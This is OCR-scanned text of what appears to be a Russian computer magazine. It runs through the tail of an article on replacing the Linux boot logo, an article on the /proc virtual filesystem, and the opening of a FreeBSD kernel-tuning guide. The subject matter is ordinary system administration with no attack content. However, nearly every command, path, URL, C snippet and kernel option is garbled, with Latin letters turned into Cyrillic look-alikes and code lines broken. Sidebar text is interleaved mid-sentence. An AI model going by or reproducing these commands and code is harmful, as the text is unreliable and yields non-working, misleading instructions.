ляет собой обыкновенный рсх-файл с глубиной цветности не более 
256 цветов и общей площадью не более чем 786432 пикселей (что 
соответствует разрешению 1024x768). 

Конвертор нам совершенно неинтересен (кстати говоря, вместо него 
можно воспользоваться плагином для редактора Оітр: гедізігу.дітр.огд/ 
беШіІѵіеѵѵ.рПІтІ?рІидіп=ипих+І_одо), а вот к экстрактору/патчеру мы 
присмотримся повнимательнее. 



Алгоритм работы понять нетрудно. Как мы видим, в процессе изме- 
нения лого модифицируются файлы Іодо_2_4.ррт, Іодо_Ьѵѵ_2_4.рЬт 
и Іодо16_2_4.ррт, которые мы и должны сохранить на «спасатель- 
ную» дискету перед запуском утилиты. Подробнее об этом хаке мож- 
но почитать в статье НОѴѴТО І_іпих І_одо Наск (депіоо-ѵѵікі.сот/ 
НОѴѴТО_І_іпих_1_одо_Наск). 

А вот другой способ изменения лого, подходящий для старых ядер 2.2.x, 
которые все еще встречаются в природе. Сначала забэкапим ориги- 
нальный фаілп/изг/іпсІисІе/Ііпих/Ііпих_Іодо.Іі (впрочем, если бэкапа не бу- 
дет, его всегда можно скачать из Сети), затем подготавливаем свое 
собственное лого в формате хрт с разрешением 80x80 пикселей и па- 
литрой *ровно* из 214 цветов (в этом нам опять-таки поможет Оітр), 
натравливаем на нее утилиту ЬооНодо-1.01 (Іид.итЬс.еби/~таЬ2ид1/ 
ЬооЫодо-1 .01), представляющую собой обыкновенный перловый 
скрипт, запущенный следующим образом: 

# ЬооІ_Іодо-1.01 уоиМтаде.хрт > Ііпих_Іодо.Іі 

И, если все пройдет без ошибок, в текущей директории образуется 
файл Ііпих_Іодо.Гі, который нам предстоит скопировать в каталог: 
/изг/іпсіисіе/ііпих. Теперь необходимо перекомпилировать ядро и пере- 
загрузиться. Если мы не повиснем, на экране высветится новое лого, ко- 
торое может выглядеть, например, так, как показано на рисунке «видо- 
измененное лого». Если возникнут трудности, можно обратиться за по- 
мощью к Іид.итЬс.есІи/~таЬ^ид1/Ьооі_Іодо.МтІ. 

[препарируем 2.6] С ядром 2.6 все намного проще. Создаем изобра- 
жение в формате рпд любого разумного размера и пропускаем его че- 
рез штатную утилиту рпдіорпт, запущенную со следующими ключами 
командной строки: 

# рпдіорпт Іодо. рпд I рптіоріаіпрпт > Іодо_Ііпих_сІіЛ224.ррт 

А затем полученный файл перебрасываем на место постоянной дисло- 
кации: 



[один из ключевых фрагментов файла Іодо_2_4.с, изменяющего лого] # ср Іодо_Ііпих_сІЩ224.ррт /изг/згс/ііпих/сігіѵегз/ѵісіео/іодо/ 



зіаііс зігисі еп!гу{ипзідпесі сііаг геф ипзідпесі сИаг дгееп; ипзідпесі сііаг 
Ыие;} раІеПеІ 6[1 6] = { 

{ 0, 0, 0, }, { 0, 0, 170, }, { 0, 170, 0, }, { 0, 170, 170, }, 

{ 170, 0, 0, }, { 170, 0, 170, }, { 170, 85, 0, }, { 170, 170, 170,}, 

{ 85, 85, 85, }, { 85, 85, 255, }, { 85, 255, 85, }, { 85, 255, 255, }, 

{ 255, 85, 85, }, { 255, 85, 255, }, { 255, 255, 85, }, { 255, 255, 255 }, 



Остается настроить ядро, для чего можно воспользоваться интерактив- 
ным конфигуратором. Среди прочих полезных (и не очень) пунктов в 
нем будет ВооЮр Іодо и ЗіапбагсІ 224-соІог І_іпих Іодо. Вот их-то и необ- 
ходимо «взвести». 

[интерактивное конфигурирование лого в кегпеі 2.6] 



Оеѵісе Огіѵегз -> 

ОгарГіісз ЗирроП -> 

[*] ЗирроП Тог Ігате ЬиЛег сіеѵісез 
[*] ѴЕЗА ѴОА дгарГіісз зиррогі 



СО 

О 



Сопзоіе сіізріау бгіѵег зиррогі -> 

[*] Ѵібео тобе зеіесйоп зиррогі 
<*> РгатеЬиЛег Сопзоіе зиррогі 
ПЗеІесІ сотрііеб-іп Іопіз 
[*]ѴОА 8x16 Тот 



зТаТіс ѵоісі ѵѵгіІе_Іодо16(соп$1 сііаг *ІіІепате, сопзТ ипзідпесі сііаг 
*(Ма) 

{ 

РНЕ *зІгеат; іпТ і, ], сі; 

зігеат = Тореп(ТМепате, V); 

і! (ІзТгеат) { реггог("ТМе ореп еггог: "); ехіфі); } 

ТриТз("РЗ\п80 80\п255\п", зігеаш); 

Тог (і = 0; і < 80*80/2; і += 2) 

{ 

Тог (] = 0; ] < 2; ]++) 

{ 

сі = (Ма[і+і] » 4; 

ТргіпТТ(з1:геат, " %3сі %3сі %3сі", раІеТТеІ 6[сі].гесі, 
раІеТТеІ 6[сі]. дгееп, раІеТТеІ 6[сі].Ыие); 
сі = (Ма[і+і] & 15; 

ТргіпТТ(з1:геат, " %3сі %3сі %3сі", раІеТТеІ 6[сі].гесі, 
раІеТТеІ 6[сі]. дгееп, раІеТТеІ 6[сі].Ыие); 

} Іри1с('\п', зігеат); 

}ІсІозе(зІгеат); 

} 

іпТ таіп(іпІ агдс, сііаг *агдѵ[]) 

{ 

міІе_Іодо("Іодо_2_4.ррт",Ііпих_Іодо,Ііпих_Іодо_гесі,Ііпих_Іодо_дгееп,І 

іпих_Іодо_Ыие); 

ѵѵгі1:е_Іодо_Ь\л/("Іодо_Ь\л/_2_4.рЬт", Ііпих_Іодо_Ь\л/); 
ѵѵгіІе_Іодо1 6("1одо1 6_2_4.ррт", Ііпих_Іодо1 6); 

геТигп 0; 

} 



І_одо сопіідигаііоп -> 

[*] ВооЮр Іодо 

[*] ЗіапбагсІ 224-соІог І_іпих Іодо 

Перекомпилируем ядро, запустив таке, и настоим конфигурацион- 
ный файл /Ьооі/дгиЬ/тепи.Ізі, добавив ключ ѵда=0х318. В итоге полу- 
чится такая запись: кегпеі (ГісЮ,0)/ѵтІіпи2 гооС=/сІеѵ/зсІаЗ ѵда=0х318. 
Перезагрузимся. Новое лого торжественно появится на экране, сияя 
всеми своими 224-цветами. Красиво? Однако настоящие хакеры 
признают только текстовой терминал и консольный режим с АІМЗІ- 
псевдографикой, а ОШ прогоняют прочь. Большой популярностью 
пользуются АЗСІІ-лого, которые можно установить с помощью прог- 
раммы І_іпих_Іодо (ѵѵѵѵѵѵ.сіеаіег.пеі/ѵѵеаѵе/ѵтѵѵргосі/ііпихиодо/). Там 
же на сервере находится коллекция готовых образцов, два из кото- 
рых приведены ниже. л 

ю 

о 

[заключение] Вот мы и хакнули пингвина, причем, не одним, а сра- ^ 
зу несколькими способами. Простор для творчества здесь поистине о 
безграничен, и поиск по ключевым словам Ііпих Іодо в Интернете вы- о. 

дает огромное количество ресурсов, один интереснее другого. Так * 

что налетайте © 



аюхіічп 








ЮНИТЫ КРЕАТИФФ КОДИНГ ІШІХОЮ СЦЕНА ВЗЛОМ ИМПЛАНТ РС_^ШЕ РЕВРШМ ^ НЬЮСЫ 
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Путешествие 
к центру ядра 

В ТО ВРЕМЯ, КАК В ДРУГИХ ОПЕРАЦИОННЫХ 
СИСТЕМАХ ДЛЯ ПРЕДОСТАВЛЕНИЯ ПОЛЬЗО- 
ВАТЕЛЮ ВОЗМОЖНОСТИ КОНТРОЛИРОВАТЬ 
РАБОТУ ЯДРА, А ТАКЖЕ ДЛЯ ПОЛУЧЕНИЯ ДО- 
СТУПА К СИСТЕМНОЙ СТАТИСТИКИ С ПО- 
ДРОБНОЙ ИНФОРМАЦИЕЙ О ПРОЦЕССАХ, ЖЕ- 
ЛЕЗЕ, СЕТИ ТРЕБУЕТСЯ ВЕЛИКОЕ МНОЖЕ- 
СТВО РАЗНООБРАЗНЫХ ПРОГРАММ, В ІЛЧІІХ 
ВСЕ ЭТО ДОСТИГАЕТСЯ ЧРЕЗВЫЧАЙНО ПРО- 
СТЫМ ПУТЕМ — С ПОМОЩЬЮ ФАЙЛОВОЙ СИ- 
СТЕМЫ /РРЮС. КАК РАЗ О РРЮСРЗ И ПОЙДЕТ 
РЕЧЬ В ЭТОЙ СТАТЬЕ I ііт (ііт@іі8і.ш) 



Исследуем виртуальную 
файловую систему ргосіз 

[общие сведения о ргосіз] В первую оче- 
редь, виртуальная файловая система ргосіз 
предназначена для получения информации о 
запущенных процессах — имя, уникальный 
идентификатор, отведенная память и т.д. В І_і- 
пих она также обеспечивает пользователя ин- 
формацией о железе, файловых системах, пре- 
доставляет доступ к системной статистике, 
а также позволяет изменять некоторые пара- 



метры ядра «на лету». Что интересно, ргосіз не существует ни на физи- 
ческом диске, ни в оперативной памяти. Когда происходит обращение к 
какому-либо из файлов, который находится в каталоге /ргос (именно к 
нему обычно монтируется эта ФС), ядру передается соответствующее 
сообщение и оно, в ответ, отдает необходимую информацию. Таким об- 
разом, создается иллюзия работы с настоящей ФС, расположенной на 
жестком диске. С ргосіз работает очень большое количество программ, 
поэтому она является жизненно важной для любого Ыпих-дистрибутива. 

[процессы в разрезе] Раз уж ргосіз задумывалась как «файловая 
система процессов», то и начнем именно с этой функции. Если ты загля- 
нешь в каталог /ргос, то увидишь множество каталогов с именами, со- 
стоящими только из цифр. Такое имя указывает на РЮ процесса и со- 
держит информацию, относящуюся к процессу с этим идентификато- 
ром. Например, информацию о процессе іпіі, который всегда имеет РЮ, 
равный единице, можно найти в каталоге /ргос/1. Есть еще один спе- 
циальный элемент каталога, относящийся к процессам: /ргос/зеІІ. Это 
ссылка указывает на процесс, в данный момент работающий с катало- 
гом /ргос. Теперь разберемся с содержимым таких каталогов. Первый 
файл, на который следует обратить внимание: стсіііпе. Это строка запу- 
ска процесса, то есть имя программы и аргументы. Если этот файл ни- 
чего не содержит, значит, процесс находится в зѵѵар или превратился в 
зомби. Также в каталоге находится ссылка с именем ехе, указывающая 
на исполняемый файл, при запуске которого был порожден процесс. Та- 
ким образом, можно запустить копию процесса. Еще две ссылки гооі и 
сѵѵсі указывают на корень файловой системы и текущий рабочий ката- 
лог процесса. Очень полезным может оказаться содержимое файла еп- 
ѵігоп, в нем ты найдешь окружение процесса (унаследованные перемен- 
ные окружения). Обрати внимание, что строки файла разделены не сим- 
волом новой строки, а нулевым символом (знающие Си поймут, почему 
так сделано). Поэтому, чтобы представить содержимое файла в удобо- 
читаемом виде, придется выполнить такую команду: 

# саі /ргос/РЮ/епѵігоп I Іг "\0" "\п" I Іезз 

Если уж говорить об окружении процессов, то следует упомянуть и о ка- 
талоге ІсІ, который содержит ссылки на файлы, открытые процессом. 
Имя ссылки представляет собой файловый дескриптор. Как известно, 
файловые дескрипторы 0, 1 и 2 любого процесса представляют собой 
стандартные потоки ввода, вывода и вывода ошибок. Поэтому для 
обычной консольной программы все три файла будут ссылаться на тер- 
минальное устройство (/ сіеѵ/ѵс /* для консоли и /деѵ/різ/* для хіегт). В 
случае с демонами, файлы будут указывать либо на /сіеѵ/пиіі, либо вооб- 
ще будут отсутствовать (если программа закрыла файловые дескрипто- 
ры). Зная вышеизложенное, можно проделывать интересные трюки, на- 
пример, перенаправлять вывод программы на ее поток ввода: 

# соттапсі > /ргос/зеІТ/ТсІ/О 

Используя ргосіз, также можно узнать, какое адресное пространство за- 
нимает процесс. Такая информация доступна в файле тарз, предста- 
вленном в виде строк. Каждая строка имеет следующий формат: адре- 
сное пространство, права, смещение в исполняемом файле, устройство, 
на котором расположен файл, номер файлового дескриптора, путь до 
исполняемого файла или библиотеки. Этот файл очень полезен, если 
нужно узнать, какие библиотеки, откуда и по каким адресам загружает 
процесс. Популярная программа ІзоІ активно использует эти сведения. 
Статистические данные о процессе представлены в файлах зіаі, зіаіт и 
зіаіиз. Первые два имеют «сырой» формат, довольно неплохо восприни- 
маемый программистами (но никак не обычными пользователями). За- 
то зіаіиз предоставляет ту же инфу, но в читабельном виде. Из назва- 
ний полей легко понять их назначение, поэтому не буду вдаваться в по- 
дробности. 




Соге-файл — это файл, 
генерируемый ядром в 
момент «обрушения» 
программы (сигналы СЮ- 
ІТ, АВРТ, ЗЕ6Ѵ и др.). Он 
содержит дамп памяти 
процесса и предназначен 
для выявления причин 
произошедшего. 

Шутливое определение 
ВодоМІРЗ: «Сколько раз 
в секунду процессор мо- 
жет ничего не делать». 



© Соге-файл — это файл, [аппаратный уровень] Посред- 
генерируемый ядром в ством /ргос о железе можно узнать 
момент «обоѵшения» многое: информацию об имеющихся 
процессорах, оперативной памяти, 
РСІ-шине и т.д. Все данные предо- 
ставляются в реальном времени. 
Это значит, что подцепив к компу ка- 
кое-нибудь ріид'п'ріау устройство, ты 
тут же сможешь с помощью ргосіз 
получить о нем полное представле- 

# Шутливое определение ние. Для начала заглянем в файл 
ВодоМІРЗ: «Сколько раз /ргос/сриіЫо, который содержит, как 
в пякѵнлѵ ппппяпппп мп- можно догадаться, информацию о 
центральном процессоре. Из полей, 
заслуживающих внимания, я бы от- 
метил следующие: ѵепбог_ісІ — строка, идентифицирующая поставщи- 
ка процессора, тобеі пате — модель процессора (например, АІѴЮ Зет- 
ргоп(іт) 2600+) , сри МН 2 — частота работы процессора (точность до ты- 
сячной доли), сасПе зіге — объем кэш-памяти, ІІадз — поддерживаемые 
наборы инструкций (такие, как ММХ и ЗЗЕ). Также взгляни на поле Ьо- 
дотірз — это псевдотест производительности процессора. 

Далее по приоритету идет, конечно же, информация об оперативке, ко- 
торая легко извлекается из файла /ргос/тетіпіо. Полей тут достаточно 
много, и их количество зависит от опций, с которыми было собрано 
ядро (например, ИідІітет). Общее количество оперативной памяти ука- 
зывается в поле МетТоІаІ. Не удивляйся, если не будет хватать 2 — 5 
байт, они ушли на размещение ядра в памяти и не доступны пользова- 
тельским программам. Что такое МетРгее, я объяснять не буду, а вот 
поля ВиІІегз и СасІіесІ довольно интересны. Первое указывает объем па- 
мяти, отведенный под кэш жесткого диска, а второе отражает количе- 
ство кэшированных с диска файлов. Информация о зѵѵар-областях на- 
ходится в полях ЗѵѵарТоІаІ и ЗѵѵарРгее. Стандартная команда Ігее полу- 
чает информацию из этого файла. 

Полную информацию о всех РСІ-устройствах, найденных во время за- 
грузки І_іпих, ты найдешь в файле /ргос/рсі. РСІ-шина в современных ПК 
является не только шиной расширения, но и базой для других шин (на- 
пример, ІІЗВ), поэтому /ргос/рсі, кроме информации по подключенным 
устройствам, предоставляет данные о различных контроллерах и дру- 
гих шинах. Настоятельно рекомендую включить в ядре копию Виз ор- 
йопз (РСІ, РСМСІА, ЕІЗА, МСА, ІЗА) -+ РСІ беѵісе пате сІаІаЬазе. После 
этого изменения ядро распухнет на 80 Кб, зато все РСІ-устройства бу- 
дут иметь осмысленные имена вместо ІІпкпоѵѵп. 

Информация о других устройствах, подключенных к РЗ/2 (мышь, кла- 
виатура) и ІІЗВ портам, находится в файлах /ргос/Ьиз/іприі/сІеѵісез и 
/ргос/Ьиз/изЬ/сіеѵісез. Причем для того, чтобы второй файл присутство- 
вал в операционке, ядро должно быть собрано с опцией Оеѵісе Огіѵегз -+ 
ІІЗВ зиррогі -> ІІЗВ беѵісе Іііезузіет. 

Теперь перейдем к АСРІ, которая, в первую очередь, является системой 
управления питанием и энергопотреблением. В ргосіз предусмотрена 
возможность перевода системы в различные неэнергоемкие состояния 
сна. Все поддерживаемые материнской платой состояния перечислены 
в файле /ргос/асрі/зіеер. 

Тебе придется включить в ядре опцию Роѵѵег тападетепі орііопз (АСРІ, 
АРМ) -» асрі — АСРІ... -+ ЗІеер Зіаіез для того, чтобы получить возмож- 
ность управлять состояниями АСРІ. Для 34 понадобится еще и опция 
Роѵѵег тападетепі орііопз (АСРІ, АРМ -+ ЗоТСѵѵаге Зизрепб, а также 
необходимо добавить гезите=/сІеѵ/где_у_тебя_своп в опции загрузки 
ядра. 

Перевести ПК в режим сна очень просто. Достаточно записать в файл 
/ргос/асрі/зіеер номер состояния. Например, так: 



і есііо 3 > /ргос/асрі/зіеер 



И последний элемент каталога /ргос, который я хочу рассмотреть в этом 
разделе: /ргос/сігіѵег. Обычно драйверы сторонних производителей соз- 
дают в нем свой уголок. Наполнение этого каталога сильно зависит от 
конфигурации ядра, поэтому я опишу его на примере своей машины. У 
меня здесь находится файл гіс, отображающий статистику работы од- 
ноименного драйвера (ВеаІ Тіте СІоск — Часы Реального Времени), а 
также каталог пѵісііа, созданный фирменным драйвером для видеокарт 
компании пѴісІіа. 



[идентификация] Что же в первую очередь нужно узнать об ОС? — 
«Конечно же, версию,» — отвечают все дружно. Правильно, информа- 
ция о версии и времени сборки ядра представлена в /ргос/ѵегзіоп при- 
мерно такой строкой: 



Аренда виртуального 
выделенного сервера 

Как апраёдать сшіѵтиенные ожчи)аннн 
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Хочешь выяснить, с какими параметрами было загружено ядро? Загля- 
ни в файл /ргос/стсіііпе. 

Список загруженных в текущий момент модулей содержится в фай- 
ле /ргос/тодиіез. Формат его такой: имя_модуля размер количе- 
ство_зависимостей — Ыѵе адрес_в_памяти. Количество зависимо- 
стей — это число, указывающее на то, сколько других модулей за- 
висит от данного модуля. Команда ІзтосІ обращается за информаци- 
ей именно к/ргос/тосіиіез. 

Все поддерживаемые ядром файловые системы перечислены в файле 
/ргос/іііезузіетз. Этот список, кстати говоря, может оказаться несколько 
длиннее, чем ты думаешь ;). У меня, например, в списке присутствуют 
Ьсіеѵ, зоскіз, ріреТз, еѵепфоІІІз. Все они нужны для правильного функци- 
онирования ядра. Какие из этих ФС смонтированы в текущий момент, 
подскажет файл /ргос/тоипіз, формат которого идентичен конфигу 
/еІс/ІзіаЬ. Информация о смонтированных зѵѵар-областях доступна в 
/ргос/зѵѵарз. 



Помимо вышеперечисленных файлов, существует еще каталог /ргос/із, 
в который, по задумке разработчиков Ыпих, должны помещать всевоз- 
можную информацию драйвера файловых систем. В реальной жизни 
здесь можно найти только информацию по драйверу ЫРЗ, файловой си- 
стеме геізегТз и, если наложен соответствующий патч, по зирегтоипі. 
Обрати внимание: если ты хочешь получать статистику о геізегТз, тебе 
придется включить в ядре опцию Рііе зузіетз іп /ргос/із/геізегіз. 

[сеть] Вся сетевая статистика хранится в файлах, расположенных в ка- 
талоге /ргос/пеі. Текущие подключения перечислены в файлах Іср, ибр и 
ипіх. По сути, они предоставляют ту же информацию, что и пеізіаі, но в 
формате таблицы сокетов ядра. Это значит, что все данные представле- 
ны в шестнадцатиричном формате (включая ІР-адреса и порты), а со- 
стояние соединений идентифицируется числом. Таблица «сырых» соке- 
тов находится в файле гаѵѵ. Дамп таблицы маршрутизации можно найти 
в файле гоиіе. Приятная для глаз обычного человека, инфа находится 
только в двух файлах: агр и беѵ. Первый — это АВР-таблица (таблица 
соответствий ІР и М АС-адресов), а второй содержит статистику по сете- 
вым устройствам. Файл сіеѵ представляет собой таблицу из трех секций: 
сетевой интерфейс, статистика принятых и переданных данных. Вторая 
и третья секция имеют одинаковый формат и содержат такие колонки: 
Ьуіез — общее количество переданной/принятой информации, раскеіз — 
число пришедших/ушедших пакетов, еггз — число пакетов с неправиль- 
ными заголовками, бгор — число отброшенных (например, брандмау- 
эром) пакетов, тиШсазІ — число широковещательных пакетов. Вся эта 
информация используется утилитой іісопіід для вывода отчета. 

[ядерная бухгалтерия] Главным местом скопления статистической 
информации о ядре является файл /ргос/зіаі. Первая строка, озаглав- 
ленная сри, отображает данные о том, сколько процессор тратит време- 
ни на выполнение кода пользовательских программ (первое число), ко- 
да ядра (третье число), время «спячки» процессора (четвертое число), 
сколько времени ждет выполнения операций ввода/вывода (пятое чи- 
сло), и сколько времени уходит на обработку прерываний (шестое чи- 
сло). Остальные колонки не столь интересны. Данные представлены в 
сотых долях секунды. Хочу отметить, что в нормально функционирую- 
щей системе время бездействия процессора будет в несколько раз 
больше времени его работы. Остальные строки не столь интересны, но 
я все же прокомментирую некоторые из них. Вііте — время загрузки си- 
стемы, указанное в секундах, прошедших с 1 января 1970 г. Ргосеззез 

— общее количество порожденных с момента загрузки процессов. 
Такую важную для многих информацию, как средняя загруженность 
процессора, можно узнать из файла /ргос/іоасіаѵд. Многих новичков 
его содержимое вводит в ступор. На самом деле, все просто, хотя и 
не привычно. Три числа представляют количество заданий (процес- 
сов), ждущих своего выполнения за последние 1, 5 и 15 минут. Таким 
образом, если в среднем за минуту ожидало исполнения менее одно- 
го задания, то загруженность составляет около 5 — 10%, 2 — 3 задания 

— уже около 80-90%, 4 — 5 заданий — 100% загрузка. Многие про- 
граммы, подсчитывающие загрузку процессора в процентах, получа- 
ют данные из этого файла. 

Время, прошедшее с момента загрузки, находится в /ргос/ирііте. 
Файл содержит два числа: общее время и время простоя процессо- 
ра. Отсчет ведется в секундах. У меня второе число всего на сто 
меньше первого :). 

[что осталось за кадром] А за кадром у нас сегодня остался псев- 
дофайл /ргос/ксоге. Он отображает всю физическую память системы 
в формате соге, и поэтому позволяет анализировать внутренние струк- 
туры ядра в реальном времени. Для того, чтобы воспользоваться этой 
возможностью, тебе необходимо загрузить ядро, содержащее отладоч- 
ную информацию (оно помещается в корень исходников после сборки: 
/изг/згс/ѵтііпих) и выполнить от рута команду: 

$ дсіЬ --соге=/ргос/ксоге 

Замечу, что этот файл не будет существовать, если в ядре отключена 
опция Рііе зузіетз -»РзеисІо Іііезузіетз /ргос/ксоге зиррогГ 
Также в этой статье я упустил из вида тюнинг ядра посредством 
/ргос/зуз (или зузсіі) — это тема отдельной статьи © 



ОСНОВНЫЕ СОСТОЯНИЯ СНА АСРІ 

81 — минимальное сохранение энергии. Быстрое пробуждение. 

83 — все устройства , кроме оперативной памяти, переводятся в режим пониженного питания. 

84 — содержимое оперативной памяти сохраняется в зи /ар. После этого происходит выключение ПК. При следующей 
загрузке ядро переносит информацию из зі/і/ар обратно в оперативку. 
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ЮНИТЫ КРЕАТИФФ КОДИНГ ІШІХОЮ СЦЕНА ВЗЛОМ ИМПЛАНТ РС_20ЫЕ РЕНРШМ НЬЮСЫ 




НИ ДЛЯ КОГО НЕ СЕКРЕТ, ЧТО ДЕФОЛТНЫЕ 
УСТАНОВКИ ЛЮБОЙ ОПЕРАЦИОННОЙ СИСТЕ- 
МЫ ДАЛЕКИ ОТ СОВЕРШЕНСТВА. ПОЭТОМУ 
ТЕМ, КТО ПОСТОЯННО ЭКОНОМИТ СВОЕ ВРЕ- 
МЯ И СИЛЫ НА КРОПОТЛИВУЮ НАСТРОЙКУ, 
ВОЛЕЙ-НЕВОЛЕЙ ПРИХОДИТСЯ ИСПЫТЫВАТЬ 
ОПРЕДЕЛЕННЫЙ ДИСКОМФОРТ С СИСТЕМОЙ, 
НЕ ЗАТОЧЕННОЙ ПОД КОНКРЕТНЫЕ НУЖДЫ. 
А ВОТ НАСТОЯЩИЙ ЮНИКСОИД (КАКИМ ТЫ, 
БЕЗ СОМНЕНИЯ, ЯВЛЯЕШЬСЯ) НЕ СТАНЕТ С 
ЭТИМ МИРИТЬСЯ И ДОБЕРЕТСЯ ДО ГЛУБОКО 
ЗАПРЯТАННЫХ ОПЦИЙ, ЧТОБЫ УВЕЛИЧИТЬ 
БЕЗОПАСНОСТЬ, НАДЕЖНОСТЬ И БЫСТРО- 
ДЕЙСТВИЕ ЛЮБИМОЙ ОПЕРАЦИОНКИ. НО 
ДЛЯ ТАКИХ РЕШИТЕЛЬНЫХ ДЕЙСТВИЙ МО- 
ЖЕТ ПОНАДОБИТЬСЯ РУКОВОДСТВО, КОТО- 
РОЕ И ПРЕДСТАВЛЕНО ТВОЕМУ ВНИМАНИЮ. 

В ОСНОВНОМ, МЫ БУДЕМ ГОВОРИТЬ О НАСТ- 
РОЙКЕ ДЕСКТОПА, В СЛУЧАЕ ЖЕ СЕРВЕРА 
БУДУТ ДЕЛАТЬСЯ СПЕЦИАЛЬНЫЕ РЕМАРКИ. 

ПРИСТУПИМ I Валерия Комиссарова (косИегді @ таіі.ги) 



Тонкая настройка 
и оптимизация РгееВЗй 

[ядро — всему голова] Ядро является мозговым центром операцион- 
ной системы, реализующим все и вся: виртуальную память, процессы, 
сигналы, семафоры, каналы, сетевые соединения, файловые системы, и, 
конечно же, множество драйверов устройств. Разработчики включают 
поддержку как можно большего количества устройств, чтобы адаптиро- 
вать работу операционки к любой аппаратной среде. Нам такой вариант, 
естественно, не подходит: мы исключим из ядра поддержку всех ненуж- 
ных нам опций, модулей и драйверов, что позволит нам уменьшить раз- 
мер ядра, и, соответственно, объем занимаемой им памяти. Кроме того, 
в умолчальном ядре может отсутствовать поддержка необходимых тебе 
устройств/протоколов, поэтому без перекомпиляции здесь не обойтись. 

[конфигурирование и перекомпиляция ядра] Ядро собирается 
из исходников, которые расположены в каталоге /изг/згс/зуз (если сыр- 
цы отсутствуют, воспользуйся дистрибутивным компактом и утилитой 
зузіпзіаіі, либо получи нужную версию с помощью сѵз/сѵзир). Теперь пе- 
реходим в каталог с шаблонами и делаем копию файла дефолтной кон- 
фигурации: 

# ссі /и з г/5 гс/зу з/' а г с Іі -з'/сопі 

# ср ѲЕЫЕРІС МѴКЕРМЕІ. 

Разобрать все опции в одной статье не представляется возможным, по- 
этому поговорим о самых интересных из них. Файл конфигурации ядра 
условно разбит на блоки, поэтому и разбирать опции будем поблочно. 

тасЫпе І386 
сри І386.СРУ 
сри І486_СРІІ 
сри І586_СРІІ 
сри І686_СРІІ 
Шепі ѲЕЫЕВІС 
тахизегз 32 

Первая строка сообщает об архитектуре используемой машины. Следую- 
щие четыре позволяют выбрать конкретный тип процессора. Оставляем 
только строку с нашим типом проца (І686_СРІІ - Репйит Рго и выше). Все 
остальные комментируем, либо удаляем. Значение параметра ібепі зада- 
ет метку нового ядра (ібепі и имя конфига должны быть одинаковыми). 
Особый интерес представляет ключевое слово тахизегз. Судя по назва- 
нию, можно с уверенностью предположить, что этот параметр ограничи- 
вает максимальное число пользователей, однако с его помощью зада- 
ются размеры некоторых внутренних таблиц ядра: предельное число 
открытых файлов и запущенных процессов, сетевых буферов и т.д. (хо- 
тя это, конечно, косвенно влияет на число пользователей в системе). 
Изменять эту опцию нужно только в случае переполнения таблицы ядра, 
либо счастливым обладателям загруженного сервера. Количество фай- 
ловых дескрипторов, которые будут доступны после кастомизации это- 
го параметра, можно вычислить по формуле (20 + 16 * тахизегз). Если 
сигнала о переполнении нет, тахизегз лучше не изменять (а на медлен- 
ных машинах можно попробовать даже уменьшить, чтобы высвободить 
некоторое количество памяти). Также можно выставить тахизегз в 0, 
тогда система автоматически подберет требуемое значение. 

Директива такеорііопз ОЕВ1КЗ=-д позволяет при компиляции включать 
в ядро отладочную информацию. Опция относится к разряду крайне не- 
желательных, так как увеличивает размер и несколько снижает быстро- 
действие ядра. Хотя такая запись чрезвычайно полезна для кернел ха- 
керов при разборе дампов ядра. 




устанавливаем исходники ядра программой зузіпзіаіі 




орііопз ОРІ__МАТН_ЕМІІІ_АТЕ 
орбопз МАТН_ЕМІІІ_АТЕ 

Перечисленные опции запускают эмуляцию математического сопроцес- 
сора (нужны только, если у тебя 804865Х и ниже). 

Первый параметр является обязательным (ВЗО и без сети?), а вот под- 
держку протокола ІРѴ6 можно убрать: 

орІІОПЗ ІЫЕТ 
орііопз ІЫЕТ6 

Перейдем к файловым системам: 

орбопз РРЗ 
орііопз ІІРЗ_0ІВНАЗН 
орііопз ЗОРШРОАТЕЗ 

Первая строка — файловая система фряхи, без поддержки которой ра- 
ботать крайне затруднительно. Следующая строка включает функцио- 
нальность, повышающую скорость работы с большими каталогами (тре- 
буя при этом дополнительное количество оперативной памяти). Третий 
параметр включает в состав ядра механизм ЗоКІІрбаІез, позволяющий 
существенно увеличить скорость записи на диск. Одного наличия этой 
опции в ядре недостаточно, также необходимо обеспечить поддержку 
ЗоКІІрсІаІез для конкретных дисков (смотри вывод команды тоипі). Для 
новых файловых систем это делается командой пеѵѵіз -II /беѵ/асІ#5#, а 
для уже существующих — итоипі -АІ /; Іипеіз -п епаЫе /беѵ/асІ#5#. Те- 
перь о «неродных» файловых системах: 

орІІОПЗ ЕХТ2РЗ 
орііопз МРЗ 
орбопз ІѴЮ_РЮ0Т 
орііопз МРЗ 
орііопз ЫРЗ_В00Т 
орііопз МЗйОЗРЗ 
орііопз С09660 
орііопз СО9660_ВООТ 
орбопз РВОСРЗ 

Эти записи означают поддержку соответствующих файловых систем 
(ех12/ехІЗ, тетогу сіізкз, пТз, Іа116Ла132, ізо9660, ргос), а также возмож- 
ность загружаться с разделов с такими ФС. Актуальность этих опций ос- 
тавляю на твое усмотрение. 

Здесь стоит отметить, что в случае РгееВЗО 5.x и выше, практически 
любая функциональность ядра реализуется соответствующим модулем 
из каталога /ЬооѴкегпеІ, так что можно многое из ядра убрать, а затем 
подгружать модули по мере необходимости, либо при загрузке системы 
из /Ьооі/Іоасіег.сопі. 

орйопз С0МРАТ_43 // Совместимость с 4.3В30 (обязательно) 

орііопз С0МРАТ_РВЕЕВ304 // Совместимость с четвертой РгееВЗй 
(весьма желательно) 

орііопз ЗСЗІ_ОЕІ_АѴ=15000 // Задержка перед определением ЗСЗІ- 

устройств (в миллисекундах) 

орбопз КТВАСЕ // Поддержка кігасе 

орбопз ЗУЗѴЗНМ 

орбопз ЗѴЗѴМЗб 

орбопз ЗУЗѴЗЕМ 

Параметры, начинающиеся с 5У5Ѵ, означают поддержку разделяемой 
памяти, семафоров и сообщений в стиле Зузіет V. Это нужно лишь ог- 
раниченному числу программ, так что, в принципе, можно обойтись и 
без этих опций. Однако не забудь предварительно свериться с докумен- 
тацией по этим самым программам (например, Х-сервер Хогд требует 
ЗУЗѴ-опции). 

Кігасе включает механизм трейсинга и логирования процессов ядром. 
Выходной файл логирования — кігасе.оиі (реально нужен только хаке- 
рам и программистам). 

А теперь поговорим о параметрах, актуальных для сервера: 

орІІОПЗ ІСМР_ВАІ\ЮІ_ІМ 
орбопз ТСР_0Р0Р_ЗУЫР1Ы 
орбопз ВАІ\ЮОМ_ІР_Ю 
орііопз ТСР_ВЕЗТВІСТ_ВЗТ 

ІСМР_ВАІ\ЮІ_ІМ позволяет ограничить число ІСМР-ответов. Второй па- 
раметр предписывает отбрасывать пакеты с недопустимыми комбина- 



